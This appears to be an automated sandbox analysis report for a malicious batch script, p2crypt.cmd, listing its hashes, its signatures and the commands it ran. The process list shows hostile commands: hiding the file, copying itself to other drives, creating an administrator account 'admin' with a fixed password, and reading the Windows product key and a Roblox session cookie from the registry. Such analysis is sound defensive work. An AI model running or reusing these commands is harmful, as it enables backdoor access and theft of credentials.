Analysis

  • max time kernel
    52s
  • max time network
    71s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30-09-2022 23:41

General

  • Target

    p2crypt.cmd

  • Size

    7KB

  • MD5

    ad27fa7dbad4e1e519e8fbd87d990a0e

  • SHA1

    ec3bd53f81826b653bb9f39331a78c2eea90003c

  • SHA256

    e16944299251456c656a9facd6cca02c24cdf1dda39d22c2db96c6463927e125

  • SHA512

    8445a24d47968eab988d384f2836c85160265ca254a9fc18d329779f24eac49e36bc3d11e21917e05fae1c95e9374b179e1e9e01b58ba06f78d2c2901f0395a7

  • SSDEEP

    96:vgbIwrzw2Nrup7pgpFpipvpkDtKPmPTGpCTpWpcpXp9pBYH+SNSKS6SYScoxXfbd:XZivgFuZYGZ

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd
      2⤵
      • Views/modifies file attributes
      PID:3388
    • C:\Windows\system32\xcopy.exe
      xcopy /e /y windows.inf D:\
      2⤵
        PID:4744
      • C:\Windows\system32\xcopy.exe
        xcopy /e /y windows.inf E:\
        2⤵
          PID:3688
        • C:\Windows\system32\xcopy.exe
          xcopy /e /y windows.inf F:\
          2⤵
            PID:4772
          • C:\Windows\system32\xcopy.exe
            xcopy /e /y windows.inf G:\
            2⤵
              PID:4492
            • C:\Windows\system32\xcopy.exe
              xcopy /e /y windows.inf H:\
              2⤵
                PID:3288
              • C:\Windows\system32\xcopy.exe
                xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd D:\
                2⤵
                  PID:3716
                • C:\Windows\system32\xcopy.exe
                  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd E:\
                  2⤵
                    PID:2136
                  • C:\Windows\system32\xcopy.exe
                    xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd F:\
                    2⤵
                      PID:2060
                    • C:\Windows\system32\xcopy.exe
                      xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd G:\
                      2⤵
                        PID:4404
                      • C:\Windows\system32\xcopy.exe
                        xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd H:\
                        2⤵
                          PID:4816
                        • C:\Windows\system32\net.exe
                          net user admin loveu /add
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:68
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user admin loveu /add
                            3⤵
                              PID:1012
                          • C:\Windows\system32\net.exe
                            net user admin loveu
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4848
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 user admin loveu
                              3⤵
                                PID:5064
                            • C:\Windows\system32\net.exe
                              net localgroup administrators admin /add
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3956
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 localgroup administrators admin /add
                                3⤵
                                  PID:4264
                              • C:\Windows\system32\net.exe
                                net share ADMIN$
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3344
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 share ADMIN$
                                  3⤵
                                    PID:5108
                                • C:\Windows\system32\net.exe
                                  net share C$
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1436
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 share C$
                                    3⤵
                                      PID:2300
                                  • C:\Windows\system32\net.exe
                                    net share IPC$
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2876
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 share IPC$
                                      3⤵
                                        PID:1280
                                    • C:\Windows\system32\ipconfig.exe
                                      ipconfig /all
                                      2⤵
                                      • Gathers network information
                                      PID:1096
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist
                                      2⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4372
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic nic get macaddress
                                      2⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3944
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic bios get serialnumber
                                      2⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4216
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic computersystem get totalphysicalmemory
                                      2⤵
                                        PID:4252
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic partition get name,size,type
                                        2⤵
                                          PID:3320
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic path softwarelicensingservice get OA3xOriginalProductKey
                                          2⤵
                                            PID:5112
                                          • C:\Windows\system32\reg.exe
                                            reg query HKEY_CURRENT_USER\Software\Roblox\RobloxStudioBrowser\roblox.com /v .ROBLOSECURITY
                                            2⤵
                                              PID:4092

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/68-126-0x0000000000000000-mapping.dmp

                                          • memory/1012-127-0x0000000000000000-mapping.dmp

                                          • memory/1096-138-0x0000000000000000-mapping.dmp

                                          • memory/1280-137-0x0000000000000000-mapping.dmp

                                          • memory/1436-134-0x0000000000000000-mapping.dmp

                                          • memory/2060-123-0x0000000000000000-mapping.dmp

                                          • memory/2136-122-0x0000000000000000-mapping.dmp

                                          • memory/2300-135-0x0000000000000000-mapping.dmp

                                          • memory/2876-136-0x0000000000000000-mapping.dmp

                                          • memory/3288-120-0x0000000000000000-mapping.dmp

                                          • memory/3320-143-0x0000000000000000-mapping.dmp

                                          • memory/3344-132-0x0000000000000000-mapping.dmp

                                          • memory/3388-115-0x0000000000000000-mapping.dmp

                                          • memory/3688-117-0x0000000000000000-mapping.dmp

                                          • memory/3716-121-0x0000000000000000-mapping.dmp

                                          • memory/3944-140-0x0000000000000000-mapping.dmp

                                          • memory/3956-130-0x0000000000000000-mapping.dmp

                                          • memory/4092-145-0x0000000000000000-mapping.dmp

                                          • memory/4216-141-0x0000000000000000-mapping.dmp

                                          • memory/4252-142-0x0000000000000000-mapping.dmp

                                          • memory/4264-131-0x0000000000000000-mapping.dmp

                                          • memory/4372-139-0x0000000000000000-mapping.dmp

                                          • memory/4404-124-0x0000000000000000-mapping.dmp

                                          • memory/4492-119-0x0000000000000000-mapping.dmp

                                          • memory/4744-116-0x0000000000000000-mapping.dmp

                                          • memory/4772-118-0x0000000000000000-mapping.dmp

                                          • memory/4816-125-0x0000000000000000-mapping.dmp

                                          • memory/4848-128-0x0000000000000000-mapping.dmp

                                          • memory/5064-129-0x0000000000000000-mapping.dmp

                                          • memory/5108-133-0x0000000000000000-mapping.dmp

                                          • memory/5112-144-0x0000000000000000-mapping.dmp